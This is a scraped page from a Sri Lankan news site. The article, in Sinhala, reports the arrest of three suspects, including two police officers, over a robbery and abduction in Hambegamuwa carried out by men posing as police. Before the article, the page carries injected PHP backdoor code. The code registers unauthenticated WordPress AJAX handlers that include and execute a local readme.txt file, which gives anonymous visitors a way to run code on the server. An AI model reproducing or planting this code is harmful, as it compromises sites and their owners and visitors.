if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } ලක්ෂ 5ක රන් මුදල් කොල්ලයට සම්බන්ධ පොලිස් නිළධාරියෙකු ඇතුළු තිදෙනෙක් අත්අඩංගුවට - mediahumanrights.lk
mediahumanrights.lk
Local News News

ලක්ෂ 5ක රන් මුදල් කොල්ලයට සම්බන්ධ පොලිස් නිළධාරියෙකු ඇතුළු තිදෙනෙක් අත්අඩංගුවට

මුදල්, දේපොළ කොල්ලකෑමේ  සහ පුද්ගලයෙක් පැහැරගන යම් අපරාධ සිදු කළ බවට සැකපිට සේවයේ නිරත පොලිස් නිලධාරියකු  සහ වැඩ තහනමට ලක් වූ පොලිස් නිලධාරියකු ඇතුළු තිදෙනක් හම්බෙගමුව පොලීසිය විසින් පසුගිය 27දා අත්අඩංගුවට ගනු ලැබීය.  සැකකරුවන්ගෙන් දෙදෙනෙක් බලන්ගොඩ පොලිස් වසමේදීත්, අනෙක් සැකකරු ඕපනායක පොලිස් වසමේදීත් අත්අඩංගුවට ගනු ලබූ අතර තවත් සකකරුවෙක් අත්අඩංගුවට ගැනීමට සිටින බවද හබගමුව පොලීසිය පැවසුවේය.  සකකරුවන් විසින් මකොල්ල කෑමට යොදා ගත් බවට සැකකරන අංක තහඩු වෙනස් කර නවීන පන්නයේ මෝටර් රථයක් සහ හම්බෙගමුව ප්‍රදේශයේ නිවසකින් කොල්ලකන ලද ජංගම දුරකථනයක්ද සැකකරුවන් සන්තකයේ තිබී සොයා ගත් බව හම්බෙගමුව පොලීසිය පැවසුවේය.

පසුගිය 20දා රාත්‍රී හම්බෙගමුව, අලුත්වැව, කිළිම්ඹුන්න ප්‍රදේශයේ  නිවසකට රාත්‍රී නවයට මෝටර් රථයකින් පැමිණි පිරිසක් තමන් පොලීසියන් යයි පවසා නිවස සෝදිසි කිරීමට අවශ්‍ය බව දන්වා තිබේ. මුලින්ම ගෙහිමියාගේ ජංගම දුරකථනය ඔවුන් භාරයට ගෙන නිවස සෝදිසි කරන අතර නිවසේ තිබූ රුපියල් 73,500ක මුදලක් ඔවුන් විසින් පැහැරගෙන තිබේ. මේ අවස්ථාවේ නිවසේ සිට ඇත්තේ 49වන වියේ පසුවූ ගෙහිමියාත් ඔහුගේ බිරිදය. පොලීසියෙන් යයි කියා පැමිණි අය ගැන සැකසිතී නිවසේ සිටි අය ආධාර ඉල්ලා කෑ ගසා තිබේ. ගෙහිමියාගේ වැඩිමහල් පුතා එම නිවසට නුදුරින් වෙනමම පදිංචිව සිට ඇති අතර තාත්තාගේ කෑ ගැසීම ඇසී ඔහු එන විට තාත්තාව මෝටර් රථයට නංවාගෙන තිබී ඇත. නිවසට පැමිණි එක් පුද්ගලයෙක් අසල සිට ඇති අතර පුතා ඔහු සමග පොරබදා තිබේ. ඒ අවස්ථාවේ මෝටර් රථයේ සිටි කෙනෙක් ඉන් බැස තරුණයාට පහරදී අනෙක් තැනැත්තා මුදාගෙන මෝටර් රථය පලාගොස් තිබුණි. තරුණයා නිවසේ මල් පෝේචියකින් මෝටර් රථයට පහර දුන්නද එය මෝටර් රථයට වැදෙන්ටන පෙර මෝටර් රථය පලා ගොස් තිබුණි.

පැහැරගත් ගෙහිමියා රු.  442,000ක් වටිනා පවුම් පහක  පමණ රන් මාලයක් තිතරම කරේ පැලද සිටි තැනැත්තෙක් බවද  පොලීසිය පැවසුවේය. ගෙහිමියාගේ ගලබැදි රන් මාලයද පහැරගෙන වැලිගාපොල ප්‍රදේශයේදී ඔහු වාහනයෙන් බස්සවා සැකකරුවන් පලාගොස් තිබුණි. මේ සම්බධයෙන් තම්ගබෙගමුව පොලීසියට කළ පැමිණිල්ලක් අනුව දින කිහිපයක් තිස්සේ කළ විමර්ශනවලදී සැකකරුවන් පැමිණි මෝටර් රථය අත්අඩංගුවට ගෙන තිබේ. ඒ ඔස්සේ තවදුරටත් කළ විමර්ශනවලදී දැනට පොලිස් සේවයේ සිටින පොලිස් නිලධාරියෙක් සහ වැඩ තහනමට ලක් වූ පොලිස් නිලධාරියකු  27දා බලන්ගොඩදී අත්අඩංගුවට ගෙන තිබේ.

එදිනම තවත් සැකකරුවෙක්  ඕපනායකදී අත්අඩංගුවට ගැනීමට පොලීසිය සමත් වී ඇත. සැකකරුවන් සත්තකයේ තිබී පැහරරගත් ගෙහිමියාට  අයත් ජංගම දුරකථනයද පොලීසියට හමුවී තිබුණි. සැකකරුවන් තිදෙනා 28දා වැල්ලවාය මහේස්ත්‍රාත් මහේෂ් වාකිෂ්ඨ මහතා හමුවට ඉදිරිපත් කිරීමෙන් පසු දෙසැම්බර් මස 1 තෙක් රිමාන්ඩ් බන්ධනාගාරයේ තැබීමට නියම කරනු ලැබීය.

– නයනජීව බණ්ඩාර-

gossiplankanew

Related posts

යුපුන්ගෙන් තවත් ශ්‍රී ලංකා වාර්තාවක්

Shiran Viraj

රනිල් අගමැති ධුරයේ දිවුරුම් දෙයි… තනි මිනිසෙක් රටක අභියෝගය බාර ගනී..

Shiran Viraj

මහේන්ද‍්‍රන් ගේන්න මං අත්සන් 21,000ක් දින තුනක් තිස්සේ ගැහුවා.. මගේ ඇගිල්ලක් ගෙවුනා..- හිටපු ජනපති

Shiran Viraj